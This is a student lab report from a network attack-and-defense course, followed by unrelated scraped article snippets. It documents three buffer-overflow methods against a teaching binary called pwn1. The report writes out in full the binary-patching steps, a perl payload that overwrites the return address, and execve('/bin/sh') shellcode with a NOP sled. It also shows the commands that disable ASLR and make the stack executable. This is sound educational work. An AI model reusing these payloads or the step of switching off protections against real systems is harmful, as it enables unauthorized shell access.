20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

20232906 2023-2024-2 《网络与系统攻防技术》第九次作业

1.实验内容

本次实践的对象是一个名为pwn1的linux可执行文件。

该程序正常执行流程是:main调用foo函数,foo函数会简单回显任何用户输入的字符串。

该程序同时包含另一个代码片段,getShell,会返回一个可用Shell。正常情况下这个代码是不会被运行的。我们实践的目标就是想办法运行这个代码片段。我们将学习两种方法运行这个代码片段,然后学习如何注入运行任何Shellcode。

本次实验一共使用了三种不同方法进行缓冲区溢出攻击:

  • 利用程序中已有的代码片段getShell,手工修改可执行文件,改变程序执行流程,直接跳转到getShell函数。
  • 利用foo函数的缓冲区溢出漏洞,构造一个攻击输入字符串,覆盖返回地址,触发getShell函数。
  • 利用foo函数的缓冲区溢出漏洞注入一个自己制作的shellcode并运行这段shellcode。

2.实验过程

2.1 直接修改程序机器指令,改变程序执行流程

  1. 首先将pwn1.zip下载解压并放入Kali中,使用命令mv pwn1 pwn20232906将文件名进行修改,如图一所示。


    图一 修改文件名
  2. 利用objdump对pwn20232906进行反汇编,并通过管道转发给more作为输入内容便于查看,对应Linux命令如下所示:

    objdump:是在类Unix操作系统上显示关于目标文件的各种信息的命令行程序。例如,它可用作反汇编器来以汇编代码形式查看可执行文件。它是GNU Binutils的一部分,用于在可执行文件和其他二进制数据上进行精细粒度控制。objdump使用BFD库来读取目标文件的内容。

    objdump -d pwn20232906 | more
    

    如图二所示,通过查看反汇编的结果中main函数的相关部分,我们可以发现main函数调用(call)了foo函数(d7 ff ff ff),而因为有getShell函数的存在,我们便可以直接修改该程序,将调用的地址改为getShell函数的基地址即可改变程序的执行流程。


    图二 反汇编查看pwn20232906中的汇编代码
  3. 为了更改地址到getShell函数,首先我们得先弄清楚原来调用的地址d7 ff ff ff的意义。这里的地址使用了补码,且字节序为小端字节序,改写为我们习惯的大端字节序后地址就是ff ff ff d7,换算后的数值为-29h,其含义为foo函数的首地址距离call指令的下一条指令(即80484ba)的偏移量为-29,相加便可得到foo函数的地址为80484ba+ff ff ff d7=8048491

  4. 这下我们就可以确定如何修改这里的内容了,首先算出getShell的首地址相对程序下一条指令地址80484ba的偏移,即804847d-80484ba=ff ff ff c3,再将其改写为小端字节序可得c3 ff ff ff,所以我们需要将原程序中的d7 ff ff ff修改为c3 ff ff ff即可。

  5. 首先我们下载十六进制dump工具xxd,使用命令如下:

    apt install xxd
    
  6. 为了防止修改过程出现错误,故先将pwn20232906程序进行备份,使用命令:

    cp pwn20232906 pwn20232906-1
    

    然后再进行修改,通过vim打开pwn20232906-1

    vi pwn20232906-1
    

    再输入如下命令将显示模式切换成16进制模式

    :%!xxd
    

    “%!”为调用第三方操作对vim内容进行操作,如 :%!tr a-z A-Z 把全文小写字母改成大写。

    使用如下命令找到对应的数据:

    /d7ff
    

    如图三所示,可以找到对应的数据


    图三 找到程序中的对应数据内容
  7. 修改完毕数据后,首先使用如下命令将数据转换为原格式,然后再保存退出(注意顺序)

    :%!xxd -r
    
  8. 运行经过修改后的pwn20232906-1程序,可得结果如图四所示:


    图四 成功获取Shell

2.2 构造输入字符串覆盖返回地址,改变程序执行流

  1. 在2.1中我们采用了直接修改程序文件的方式获取到了Shell,但如今的程序一般都会采用签名等方式来确保程序的完整性,那么我们可不可以不修改程序文件的内容,直接通过输入特殊的字符串来修改程序的返回地址呢?答案是肯定的。如图五所示,我们再观察一下pwn1程序的汇编代码:


    图五 反汇编查看pwn20232906中的汇编代码
  2. 可以发现,在main函数调用的foo函数中仅仅只给输入的数据分配了28字节(0x1c)的空间,而堆栈的结构大致如图六所示:


图六 堆栈简单结构
  1. 也就是说,只要我们输入足够长,并将输入字符串的第33~36字节填入getShell函数的基地址(0804847d),就可以让程序跳转到getShell函数的地方了。

  2. 为了确认输入的数据应该是按照大端字节序输入还是小端字节序,我们通过命令gdb pwn20232906进入调试模式然后输入1111111122222222333333334444444412345678进行验证,如图七所示:


    图七 缓冲区溢出时寄存器数据
  3. 可以看出,eip寄存器中的值即为“4321”的ASCII码,验证了上文中的分析,这也说明我们应当使用小端字节序输入getShell函数的首地址,即7d 84 04 08

  4. 由于我们无法直接输入二进制数据,我们需要借助perl语言先生成一个包含getShell函数首地址的文件,然后通过管道让文件的内容成为pwn1的输入,使用命令如下:

    perl -e 'print "11111111222222223333333344444444\x7d\x84\x04\x08\x0a"' > input
    # \x0a代表回车,如果没有则需要手动敲一下回车来结束输入
    (cat input; cat) | ./pwn20232906
    # 通过管道让input文件中的内容成为pwn20232906的输入
    
  5. 这时我们发现我们已经成功地获得了Shell,如图八所示:


    图八 成功获取Shell

2.3 注入Shellcode并执行

  1. 前两种方法能够成功的一个前提——程序中本来就含有getShell函数,但我们一般编程的时候是不会主动去为攻击者编写这样的函数。那么对于一个普通的程序来说,使用注入Shellcode的方法才能够让这个程序去执行我们想要的功能。

    Shellcode就是一段机器指令(code),通常这段机器指令的目的是为获取一个交互式的shell(像linux的shell或类似windows下的cmd.exe),所以这段机器指令被称为shellcode。

    在实际的应用中,凡是用来注入的机器指令段都通称为Shellcode,像添加一个用户、运行一条指令。

  2. 首先我们需要下载Execstack,可以通过链接http://ftp.de.debian.org/debian/pool/main/p/prelink/execstack_0.0.20131005-1+b10_amd64.deb进行下载,下载后找到文件位置使用命令dpkg -i execstack_0.0.20131005-1+b10_amd64.deb即可完成安装。

  3. 在正式开始之前,我们需要对操作系统和程序进行一些设置便于找到我们注入的数据的地址,命令如下:

    execstack -s pwn20232906    //设置堆栈可执行
    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    
  4. Linux下有两种基本构造攻击buf的方法:

    • retaddr+nop+shellcode
    • nop+shellcode+retaddr

    这样构造是因为retaddr在缓冲区的位置是固定的,shellcode要不在它前面,要不在它后面。

    简单来说如果缓冲区小就把shellcode放后边,如果缓冲区大就把shellcode放前边

    nop的作用一是为了当作填充数据;二是作为“着陆区/滑行区”,这样可以减小我们猜测返回地址的难度,使我们猜的返回地址只要落在任何一个nop上,自然会滑到我们的shellcode

    本次实验我们构造的结构为:anything+retaddr+nops+shellcode,其中shellcode的内容如下:

    \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\
    

    使用如下命令构建字符串并保存到input_shellcode中,其中前四字节还不确定,使用12 34h填充。

    perl -e 'print "A" x 32;print "\x1\x2\x3\x4\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00"' > input_shellcode
    
  5. 接下来我们来确定\x4\x3\x2\x1到底该填什么。打开一个终端注入这段字符串:

    (cat input_shellcode;cat) | ./pwn20232906
    
  6. 再打开另一个终端,首先使用命令找到pwn1的进程号

    ps -ef | grep pwn20232906
    # 这里我返回了如下信息
    # root       67761   66720  0 20:29 pts/0    00:00:00 ./pwn20232906
    # root       67906   67798  0 20:29 pts/1    00:00:00 grep --color=auto pwn20232906
    

    再使用gdb调试该进程

    gdb
    (gdb) attach [pid]
    # 根据上面查找进程号的结果,这里pid应该填67761
    

    然后反汇编foo函数,查看返回指令(ret)的地址

    (gdb) disassemble foo
    # 这里我返回了如下信息
    # Dump of assembler code for function foo:
    # 0x08048491 <+0>:     push   %ebp
    # 0x08048492 <+1>:     mov    %esp,%ebp
    # 0x08048494 <+3>:     sub    $0x38,%esp
    # 0x08048497 <+6>:     lea    -0x1c(%ebp),%eax
    # 0x0804849a <+9>:     mov    %eax,(%esp)
    # 0x0804849d <+12>:    call   0x8048330 <gets@plt>
    # 0x080484a2 <+17>:    lea    -0x1c(%ebp),%eax
    # 0x080484a5 <+20>:    mov    %eax,(%esp)
    # 0x080484a8 <+23>:    call   0x8048340 <puts@plt>
    # 0x080484ad <+28>:    leave
    # 0x080484ae <+29>:    ret
    # End of assembler dump.
    

    在返回指令的地址处设置断点,之后在另外一个终端中按下回车,然后再使用c使程序继续运行

    break *<address>
    # 根据上面的结果,这里的<address>应该改为0x080484ae
    # 在运行程序的终端按下回车
    (gdb) c
    

    待程序运行到断点处,查看此时的esp寄存器的值,获得我们注入的字符串的地址

    (gdb) info r esp
    # 这里我返回了如下信息
    # esp            0xffffd02c          0xffffd02c
    

    我们使用如下指令查看该地址附近的数据

    (gdb) x/16x 0xffffd02c
    # 0xffffd02c:     0x04030201      0x90909090      0xc0319090      0x2f2f6850
    # 0xffffd03c:     0x2f686873      0x896e6962      0x895350e3      0xb0d231e1
    # 0xffffd04c:     0x0080cd0b      0x00333231      0x080484af      0x00000001
    # 0xffffd05c:     0xffffd0f4      0xf7e1dff4      0x080484d0      0xf7ffcba0(gdb) x/16x 0xffffcfec
    # 0xffffcfec:     0x080484ad      0xffffd00c      0x0000000c      0x00000000
    # 0xffffcffc:     0x00000000      0x00000000      0x00000000      0x00000013
    # 0xffffd00c:     0x41414141      0x41414141      0x41414141      0x41414141
    # 0xffffd01c:     0x41414141      0x41414141      0x41414141      0x41414141
    

    从0xffffd02c开始观察,可以发现数据采用小端字节序,并且将返回地址改为ff ff d0 30就可以让程序执行Shellcode,这样一来\x1\x2\x3\x4就应该修改为\x30\xd0\xff\xff,于是我们便重新利用perl语言,将返回地址修改正确,并在最后加上回车(0x0a),然后重新运行程序。

    perl -e 'print "A" x 32;print "\x30\xd0\xff\xff\x90\x90\x90\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80\x00\x0a"' > input_shellcode
    (cat input_shellcode;cat) | ./pwn20232906
    
  7. 这时我们发现我们已经成功地获得了Shell,如图九所示:


    图九 成功获取Shell

3.问题及解决方案

  • 问题1:在2.3时,使用命令execstack操作系统提示——无法定位软件包 execstack

  • 问题1解决方案:通过百度搜索,我找到了execstack的官方网站并成功找到了execstack的安装包,由于kali是Debian的发行版,所以选择了Debian版本的进行下载,具体下载地址见下面的链接。进入链接后在Download处即可找到资源的下载链接。

    https://debian.pkgs.org/10/debian-main-amd64/execstack_0.0.20131005-1+b10_amd64.deb.html

    下载到本地后,使用apt的命令即可完成安装

    apt install ./execstack_0.0.20131005-1+b10_amd64.deb
    
  • 问题2:在2.3中,获取地址后修改字符串的数据然后重新执行发现依旧不成功

  • 问题2解决方案:使用gdb进行调试,发现了每一次esp中的地址都不相同,结合实验指导书的相关内容,发现是没有关闭地址随机化,使用相应命令关闭地址随机化即可。

    echo "0" > /proc/sys/kernel/randomize_va_space //关闭地址随机化
    

4.学习感悟、思考等

本次实验进行的是缓冲区溢出攻击,通过动手实践的方式我弄懂了缓冲区溢出的基本原理和常用的方法以及可执行程序的分析方法。在本次实验中,经过王老师的讲解和刘老师的博客,我成功地入门了缓冲区溢出这一个我曾以为困难重重的课题。同时,此次实验也使我对于二进制文件有了初步的了解,拿到了二进制文件,我也不再会不知所措,而是可以通过工具对其进行一定的分析,可以说收获颇多。

本次实验也暴露出了我在某些方面还有所欠缺,例如对于汇编语言的了解还不够深入,很多命令还需要老师的点拨才能够明白它的功能;本次实验中的Shellcode是老师直接提供给我的,是只针对于获得Shell这个功能的。如果要实现其他的功能,编写自己的Shellcode,还需要我对于Shellcode的相关知识认真学习;本次实验对于地址随机化和堆栈保护都进行了关闭,那么在地址随机化和堆栈保护开启的时候如何进行缓冲区溢出攻击也值得我深入思考。只有这样我才能够在此次实验的基础上取得更大的进步。

最后,感谢王老师和刘老师的细心讲解和耐心帮助,也感谢在实验过程中给我帮助的同学们。正因为有你们的帮助我才能够顺利地完成本次实验,谢谢!

参考资料

  • 0x11_MAL 逆向与Bof基础 - wildlinux
  • execstack_0.0.20131005-1+b10_amd64.deb

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/325047.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

用户登录后端:登录密码解密后用PasswordEncoder验证密码是否正确

前置知识: 前端登录加密看用户登录 PasswordEncoder加密看PasswordEncoder详解 项目中因为要判断用户登录密码是否正确&#xff0c;通过输入错误次数锁住用户 1.后端配置rsa私钥 #密码加密传输&#xff0c;前端公钥加密&#xff0c;后端私钥解密 rsa:private_key: xxxx2. 读…

电影院购票管理系统

文章目录 电影院购票管理系统一、项目演示二、项目介绍三、部分功能截图四、部分代码展示五、底部获取项目源码&#xff08;9.9&#xffe5;带走&#xff09; 电影院购票管理系统 一、项目演示 电影院售票管理系统 二、项目介绍 基于springbootvue的前后端分离电影院购票管理…

【linux软件基础知识】如何使用 run_list 字段将任务放入就绪队列中

在给定的代码片段中,struct task_struct 表示内核中任务或进程的进程控制块 (PCB)。 run_list 字段的类型为 struct list_head,这表明它是链表实现的一部分。 run_list字段在Linux内核中常用来表示任务在调度队列中的位置,例如就绪队列或各种优先级队列。 init_task是一个…

《Python编程从入门到实践》day25

# 昨日知识点回顾 如何创建多行外星人 碰撞结束游戏 创建game_stats.py跟踪统计信息 # 今日知识点学习 第14章 记分 14.1 添加Play按钮 14.1.1 创建Button类 import pygame.font# button.py class Button:def __init__(self, ai_game, msg):"""初始化按钮…

Sqlite在Mybatis Plus中关于时间字段的处理

我的个人项目中&#xff0c;使用Mybatis-Plus 和 Sqlite数据库&#xff0c; 但是在存储和查询时间字段的时候&#xff0c;总是出现问题&#xff0c;记录下我解决问题的过程。 Sqlite会默认把时间字段转成时间戳存储到数据库的字段中&#xff0c;看起来不直观&#xff0c;所以我…

刷代码随想录有感(63):将有序数组转换为二叉搜索树(其实时二叉平衡搜索树)

题干&#xff1a; 代码&#xff1a; class Solution { public:TreeNode* traversal(vector<int>& nums, int left, int right){if(left > right)return NULL;int mid left (right - left)/2;TreeNode* NewRoot new TreeNode(nums[mid]);NewRoot->left tra…

2024最新从0部署Django项目(nginx+uwsgi+mysql)

云服务器 我这里用的是腾讯云免费试用的2H4Gcentos服务器&#xff08;后升级为2H8G&#xff0c;保险一点提高内存&#xff09; 因为网上很多关于django部属的教程都是宝塔啊&#xff0c;python版本控制器啊这种的&#xff0c;我也误打误撞安装了宝塔面板&#xff0c;但这里我…

【吊打面试官系列】Java高并发篇 - 同步方法和同步块,哪个是更好的选择?

大家好&#xff0c;我是锋哥。今天分享关于 【同步方法和同步块&#xff0c;哪个是更好的选择&#xff1f;】面试题&#xff0c;希望对大家有帮助&#xff1b; 同步方法和同步块&#xff0c;哪个是更好的选择&#xff1f; 同步块是更好的选择&#xff0c;因为它不会锁住整个对象…

【notepad++】使用

1 notepad 下载路径 https://notepad-plus.en.softonic.com/download 2 设置护眼模式 . 设置——语言格式设置——前景色——黑色 . 背景色——RGB &#xff1a;199 237 204 . 勾选“使用全局背景色”、“使用全局前景色” . 保存并关闭

Apache Flume概述

Apache Flume概述 1.Flume定义 ​ Flume是cloudera(CDH版本的hadoop) 开发的一个分布式、可靠、高可用的海量日志收集系统。 它将各个服务器中的数据收集起来并送到指定的地方去&#xff0c;比如说送到HDFS、Hbase&#xff0c;简单来说flume就是收集日志的。 2.Flume基础架构…

【Web后端】jsp基础知识_请求转发和重定向

1.jsp基础知识 1.1简介 java server page&#xff0c;运行在服务器端的页面java代码html代码java代码全部都放在<%%>中间 1.2jsp表达式 作用&#xff1a;将动态信息显示在页面上&#xff0c;以字符串方式&#xff0c;返回给浏览器端语法&#xff1a;<%变量或表达式…

Debian安装Redis、RabbitMQ、Nacos

安装Redis&#xff1a; 启动Redis、开机自启动 sudo systemctl start redis-server #启动sudo systemctl enable redis-server #开机自启 Redis状态(是否在运行) sudo systemctl status redis-server #查看运行状态 redis-cli ping # 客户端尝试连接 安装RabbitMQ&#xff0c;…

【回溯 网格 状态压缩】52. N 皇后 II

本文涉及知识点 回溯 网格 状态压缩 LeetCode52. N 皇后 II n 皇后问题 研究的是如何将 n 个皇后放置在 n n 的棋盘上&#xff0c;并且使皇后彼此之间不能相互攻击。 给你一个整数 n &#xff0c;返回 n 皇后问题 不同的解决方案的数量。 示例 1&#xff1a; 输入&#x…

conan2 基础入门(02)-安装

conan2 基础入门(02)-安装 文章目录 conan2 基础入门(02)-安装⭐前言⭐安装python安装安装包安装自行操作 ⭐验证配置环境变量命令行验证conan配置文件 END ⭐前言 Conan 2.0: C and C Open Source Package Manager 官方提供三种安装conan的方式。分别为&#xff1a; Recommen…

1290.二进制链表转整数

给你一个单链表的引用结点 head。链表中每个结点的值不是 0 就是 1。已知此链表是一个整数数字的二进制表示形式。 请你返回该链表所表示数字的 十进制值 。 示例 1&#xff1a; 输入&#xff1a;head [1,0,1] 输出&#xff1a;5 解释&#xff1a;二进制数 (101) 转化为十进制…

在k8s中部署Prometheus并实现对k8s集群的监控

&#x1f407;明明跟你说过&#xff1a;个人主页 &#x1f3c5;个人专栏&#xff1a;《Prometheus&#xff1a;监控的神》 &#x1f3c5; &#x1f516;行路有良友&#xff0c;便是天堂&#x1f516; 目录 一、引言 1、k8s简介 2、 Prometheus概述 二、准备k8s环境 1、…

IDEA安装使用Git

IDEA安装使用Git 1 Git下载与安装 2 在IDEA中使用Git 2.1 IDEA中配置Git 在IDEA中使用Git&#xff0c;本质上还是使用本地安装的Git软件&#xff0c;所以需要在IDEA中配置Git。 2.2 在IDEA中使用Git 2.2.1 获取Git仓库 在IDEA中使用Git获取仓库有两种方式: 本地初始化仓库从…

HTTP超时时间设置

在进行超时时间设置之前我们需要了解一次http请求经历的过程 浏览器进行DNS域名解析&#xff0c;得到对应的IP地址根据这个IP&#xff0c;找到对应的服务器建立连接&#xff08;三次握手&#xff09;建立TCP连接后发起HTTP请求&#xff08;一个完整的http请求报文&#xff09;服…

在R的 RGui中,使用devtools 安装trajeR

创建于&#xff1a;2024.5.5 文章目录 1. 报错信息2. 尝试使用指定的清华镜像&#xff0c;没有解决3. 找到原因&#xff1a;官网把包删除了4. 尝试从网上下载&#xff0c;然后安装。没有成功5. 使用devtools安装5.1 尝试直接安装&#xff1a;install.packages("devtools&q…

Vue从入门到实战Day04

一、组件的三大组成部分&#xff08;结构/样式/逻辑&#xff09; 1. scoped样式冲突 默认情况&#xff1a;写在组件中的样式会全局生效 -> 因此很容易造成多个组件之间的样式冲突问题。 1. 全局样式&#xff1a;默认组件中的样式会作用到全局 2. 局部样式&#xff1a;可以…